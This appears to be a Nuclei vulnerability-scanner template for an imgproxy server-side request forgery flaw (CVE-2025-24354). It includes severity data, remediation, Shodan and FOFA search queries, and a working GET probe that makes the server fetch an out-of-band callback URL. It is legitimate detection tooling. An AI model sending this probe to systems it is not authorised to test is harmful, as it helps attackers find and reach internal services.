Imgproxy < 3.27.2 - Server-Side Request Forgery (SSRF)

id: CVE-2025-24354

info:
  name: Imgproxy < 3.27.2 - Server-Side Request Forgery (SSRF)
  author: oksuzkayra
  severity: medium
  description: |
    imgproxy contains an issue caused by not blocking the 0.0.0.0 address even when IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES is set to false, letting local services be exposed, exploit requires network access.
  impact: |
    Local services may be exposed to unauthorized access, risking information disclosure or local system compromise.
  remediation: |
    The vulnerability has been fixed in imgproxy version 3.27.2. The fix involves updating the source address verification to also check for unspecified IP addresses (0.0.0.0) using the ip.IsUnspecified() function in addition to the existing ip.IsLoopback() check.
  reference:
    - https://github.com/imgproxy/imgproxy/commit/3d4fed6842aa8930ec224d0ad75b0079b858e081
    - https://github.com/imgproxy/imgproxy/security/advisories/GHSA-j2hp-6m75-v4j4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-24354
    cwe-id: CWE-918
    epss-score: 0.03658
    epss-percentile: 0.8737
  metadata:
    verified: true
    max-request: 1
    product: imgproxy
    shodan-query: http.html:"imgproxy"
    fofa-query: body="imgproxy"
  tags: cve,cve2025,imgproxy,ssrf,oast,oob

http:
  - method: GET
    path:
      - "{{BaseURL}}/unsafe/plain/http://{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
          - "status_code == 422"
          - "contains(body, 'Invalid source image')"
        condition: and
# digest: 490a004630440220529052b44c3278f3e7c7f6d574e59b7483216b9fc05a1760a7e9ffa70e2c162502205d1096d61cc8bef01c252d4881ed81c23eb37b70b51a2591a33cdd6cf8772be0:922c64590222798bb761d5b6d8e72950